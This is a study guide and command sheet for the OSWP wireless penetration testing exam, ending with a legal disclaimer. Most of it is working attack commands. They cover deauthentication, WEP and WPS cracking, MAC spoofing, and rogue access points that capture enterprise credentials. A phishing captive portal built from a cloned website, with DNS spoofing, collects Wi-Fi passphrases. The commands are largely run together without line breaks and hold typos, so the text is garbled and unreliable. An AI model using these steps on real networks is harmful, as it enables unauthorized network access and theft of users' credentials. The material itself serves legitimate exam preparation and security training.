Study guide and command sheet for Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP)
In order to run the following commands, install these frameworks first:
sudo apt install airmon-ng reaver hashcat hostapd dnsmasq nftables apache2 libapache2-mod-php freeradiusIn the event that fake authentication persistently fails, it is plausible that MAC address filtering is being employed. Under such a scheme, the Access Point (AP) will only permit connections from a predefined list of MAC addresses. Should this be the scenario, it will be necessary to acquire a legitimate MAC address by monitoring network traffic with the aid of Airodump-ng. Subsequently, impersonation of this MAC address should be carried out once the corresponding client has disconnected from the network. It is imperative to refrain from initiating a fake authentication attack targeting a specific MAC address if the client remains active on the AP.
airodump-ng -w <CAPTURE_NAME> -c <CHANNEL> --bssid <BSSID> <INTERFACE>macchanger --show <INTERFACE>aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>aireplay-ng -3 -b <BSSID> -h <YOUR_MAC> <INTERFACE>aireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>aircrack-ng <CAPTURE_NAME>WEP is a severely flawed security algorithm for IEEE 802.11 wireless networks. Below are the steps to exploit WEP vulnerabilities:
sudo airmon-ng check killsudo airmon-ng start wlan0sudo airodump-ng wlan0mon --encrypt WEPbesside-ng -c Channel -b BSSID wlan0monaircrack-ng ./wep.capWPS was originally known as Wi-Fi Simple Configuration, aiming to unify vendor technologies for secure WPA/WPA2 passphrase sharing. However, it has its set of vulnerabilities. Below are the steps to identify and exploit WPS vulnerabilities:
wash -i <INTERFACE> -saireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>reaver -i wlan0 -b BSSID -SNLAvv -c 1 -Kreaver -i <INTERFACE> -b <BSSID> -SNLAsvv -d 1 -r 5:3 -c <CHANNEL_NUMBER>Steps for testing security on networks with WPA/WPA2/WPA3 encryption, including setting up rogue APs and capturing handshakes:
Follow these steps to set up wireless monitoring and perform the attack.
airmon-ng check kill && airmon-ng start <interface>airodump-ng <interface>Note: The AUTH column will say MGT.
sudo airodump-ng -c channel -w ESSID interfaceaireplay-ng -0 0 -a ESSID -c client_ESSID interfaceAfter gathering the BSSID, ESSID, and channel:
- Use Wireshark or tshark with filters:
or
wlan.bssid==E8:9C:12:02:66:AA && eap && tls.handshake.certificate
tls.handshake.type == 11,3
View the Packet Details in TLSv1 Record Layer >> Handshake Protocol >> Certificate:
openssl x509 -inform der -in cert.der -textDetails needed for the attack include: Issuer information.
openssl x509 -inform der -in cert.der -outform pem -out output.crtInstall with:
sudo apt install freeradiusEdit the ca.cnf and server.cnf files to have less suspicious certificate authority fields.
sudo mousepad /etc/freeradius/3.0/certs/ca.cnf
sudo mousepad /etc/freeradius/3.0/certs/server.cnfUpdate the respective sections with the correct information.
Navigate to /etc/freeradius/3.0/certs/ and run:
sudo rm dh && makeNote: Ignore the error from FreeRADIUS if it expects other configurations.
Edit /etc/hostapd-mana/mana.conf with the correct SSID, Certificate paths, and EAP file.
Configure /etc/hostapd-mana/mana.eap_user with the desired protocols and authentication methods.
hostapd-mana /etc/hostapd-mana/mana.confRun asleap with the correct command to find a user with a successful login.
<asleap command> -W /usr/share/john/password.lstAdd the network configuration details:
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}Use wpa_supplicant to connect:
wpa_supplicant -c <config file>Instructions for creating a rogue AP.
sudo airodump-ng -w capturename –output-format pcap wlan0monWireshark Filters:
wlan.fc.type_subtype == 0x08 #Broadcast Frames
wlan.ssid == “apname” #AP nameFilters can be appended to filter for broadcast frames from a specific AP:
wlan.fc.type_subtype == 0x08 && wlan.ssid == “apname”The interesting parts are in Tag: Vendor Specific: & Tag: RSN: Information
Hostapd-mana template location:
/etc/hostapd-mana/hostapd-mana.confOr you may download the hostapd-mana.config in this repository and modify to your needs.
Start hostapd-mana:
sudo hostapd-mana hostapd-mana.confaircrack:
aircrack-ng name.hccapx -w /wordlist/rockyou.txtIf you run into errors, you may try:
aircrack-ng name.hccapx -e ESSID -w /wordlist/rockyou.txthashcat:
hashcat -m 2500 capture.hccapx /usr/share/worlists/rockyou.txt
This guide provides step-by-step instructions for setting up a wireless network monitoring and attack environment.
Begin by capturing information about clients and access points (APs) around you:
sudo airodump-ng wlan0monTo specify the capture details, use:
sudo airodump-ng -w fileName –output-format pcap -c channelnumber interfaceWait until the WPA handshake is captured:
sudo aireplay-ng -0 amountOfdeauths -a ApBSSID interfaceAfter completing the capture, disable monitor mode:
sudo apt install apache2 libapache2-mod-phpUse wget to download the webpage. Here, -l2 means to go 2 levels deep:
wget -r -l2 https://www.website.comCreate a directory for the phishing webpage:
sudo mkdir /var/www/html/portal && sudo mousepad /var/www/html/portal/index.phpReplicate the styling of the example website page and copy the assets:
sudo cp -r ./www.website.com/assets /var/www/html/portalConfigure the login page to redirect to login_check.php:
sudo mousepad /var/www/html/portal/login_check.phpsudo ip addr add 192.168.87.1/24 dev wlan0
sudo ip link set wlan0 upsudo apt install dnsmasq11. Create the DHCP config file at /home/kali/dnsmasq.conf and add spoofing entries for top-level domains:
address=/com/192.168.0.1
address=/org/192.168.0.1
address=/net/192.168.0.1address=/dns.msftncsicom/131.107.255.255 sudo dnsmasq –conf-file=dnsmasq.comsudo tail /var/log/syslog | grep dnsmasqsudo apt install nftablessudo nft add table ip nat
sudo nft ‘add chain ip nat PREROUTING { type nat hook prerouting priority dstnat; policy; accept; }’
sudo nft add rule ip nat PREROUTING iifname “wlan0” udp dport 53 counter redirect to :53sudo mousepad /etc/apache2/sites-enabled/000-default.confsudo a2enmod rewrite && sudo a2enmod alias
sudo systemctl restart apache2Firefox 127.0.0.1/portal/index.phpsudo apt install hostapd && mousepad hostapd.confsudo hostapd -B hostapd.conf- Terminal 1:
sudo tail -f /var/log/syslog | grep -E ‘(dnsmasq|hostapd)’- Terminal 2:
sudo tail -f /var/log/apache2/access.logsudo find /tmp/ -iname passphrase.txtsudo cat /tmp/systemd-private-b37…aef-apache2.service-b...i/tmp/passphrase.txt- ESSID of JesusIsTheWay
- BSSID of 34:5a:90:e0:5a:30
- WPS (AES/CCM)
- Uses a PSK
- Runs on channel 1- AP: Access Point
- BSSID: Basic Service Set Identifier is a 48-bit number that follows MAC address conventions.
- ESSID: Extended Service Set Identifier is a unique identifier to avoid interference on a wireless network.
- Make sure that hostapd-mana is installed on Kali. Default installations currently feature hostapd, hostapd-wpa and hostapd_cli. None of these frameworks feature the mana_wpaout section in the hostapd-mana.config, and will result in error: unknown configuration item 'mana_wpaout'
- When starting the exam, fist thing after connecting to the .ovpn is to test both SSH and RDP protocols to ensure connection works as intended.
- In order to list wireless interfaces, execute command:
sudo airmon-ng- To restart Network Manager, execute command:
systemctl restart NetworkManager.serviceThe techniques, commands, and procedures outlined in this guide are intended solely for educational purposes and preparing for the Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP). These techniques involve methodologies that, if misused, may constitute illegal activities. Users are strongly cautioned against engaging in any unauthorized and/or unlawful actions.
- Authorized Environments Only: The execution of penetration testing, network attacks, and other tactics described herein should only be performed on networks and systems that are explicitly owned or authorized for testing by the user. This includes personal hardware, controlled environments, or environments for which explicit, documented permission has been granted.
- No Unauthorized Use: Under no circumstances should these techniques be applied to networks, systems, or devices without explicit authorization. Unauthorized use of these techniques may lead to legal consequences and is strongly condemned.
- Adherence to Exam Guidelines: While this guide serves as preparation material for the OSWP exam, users must strictly adhere to the guidelines, rules, and ethical standards set forth by Offensive Security during the examination.
- Prohibited Actions: Any attempt to use these techniques outside of the specified exam environment, or in a manner not aligned with the exam's rules, may result in disqualification, legal action, and other serious consequences.
- No Responsibility for Misuse: The authors, contributors, and associated entities of this guide accept no responsibility or liability for any misuse, damage, or illegal activities arising from the information presented. Users are solely responsible for their actions.
- Acknowledgment of Risk: Users acknowledge the risks involved in security testing and penetration testing and agree to ensure ethical and legal use of this information.
- Commitment to Ethical Hacking: Users are encouraged to pursue knowledge in cybersecurity and ethical hacking with a strong commitment to legal compliance, ethical behavior, and respect for privacy and data protection.
By using the information in this guide, you acknowledge having read, understood, and agreed to this disclaimer and all its terms. Your use of this information indicates your acceptance of the risks and your commitment to using this knowledge responsibly and ethically.